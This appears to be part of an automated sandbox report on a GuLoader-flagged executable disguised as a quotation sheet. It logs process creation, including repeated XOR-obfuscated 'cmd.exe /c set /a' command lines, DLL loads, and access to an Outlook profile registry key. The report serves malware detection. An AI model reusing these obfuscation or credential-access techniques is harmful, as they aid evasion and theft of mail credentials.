            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: z1QuotationSheetVSAA6656776.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000000.00000002.38293091270.0000000005981000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.38290946612.000000000057E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: z1QuotationSheetVSAA6656776.exe PID: 5544, type: MEMORYSTR
            Obfuscated command line found
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
